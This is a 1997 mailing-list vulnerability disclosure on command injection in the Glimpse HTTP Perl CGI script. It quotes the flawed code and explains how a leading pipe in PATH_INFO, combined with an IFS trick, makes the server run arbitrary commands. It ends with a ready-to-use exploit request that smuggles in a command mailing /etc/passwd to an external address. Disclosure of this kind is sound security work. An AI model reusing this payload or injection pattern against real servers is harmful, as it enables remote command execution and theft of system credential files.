Vulnerability in Glimpse HTTP

Razvan Dragomirescu (drazvan@kappa.ro)
Wed, 02 Jul 1997 19:32:09 +0300

Hi,

I'm back with another vulnerability, this time in a small utility: Glimpse
HTTP which is an interface to the Glimpse search tool. It is written in
PERL.

First my congratulations to the authors. They've done a really great job
in securing the program (really, I mean it). The hole I exploited is a
small one but it can allow you to execute any command on the remote
system (as the owner of the http server).

Allow me to quote from the source (I'm sure I have the latest version, I
downloaded it 1 hour ago :) ).

--begin--

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
$length = $1;
$path = $2;
$path =~ s|"||g; } else {
&err_badargs; }

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

--end--

As you may see, it splits PATH_INFO in two fields: $length and
$path and then takes the first $length characters from $path and puts them
in $indexdir (my phrasing is more twisted than my mind :) ).
The last line opens "$indexdir/archive.cfg".

Now for the evil part.
By setting $indexdir to a string that begins with '|', the system will
execute whatever it finds after the pipe, giving it as STDIN what you
write to the CONF handle.

The bad thing is that most HTTP servers won't let you use TABS or SPACES
in the PATH_INFO (not the case of Netscape servers anyway, but CERN and
Apache will do it). And I don't know how many "one word" commands can
anyone find (and make them do evil).

Here's where the famous IFS variable comes handy.
If $indexdir is set to something like
"|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo"
it will execute the command in CMD using IFS as separator. The one above
sends me your /etc/passwd (so you'd better change something there :) ).
The last "echo" is used to ignore the rest of the string. An of course you
can use any other separator instead of "5".

Now for the exploit.

telnet target.machine.com 80

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo
HTTP/1.0

Note that the cgi-bin directory could be located somewhere else (for
example in /scripts or /cgi or a special directory just for glimpse...).
Also note that you HAVE to use all those backslahes in the command (perl
wants them there!).

I would like (again) to have some feedback from those who have Glimpse
installed on their systems. It should work if the script has not been
modified.

I think that would be all.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)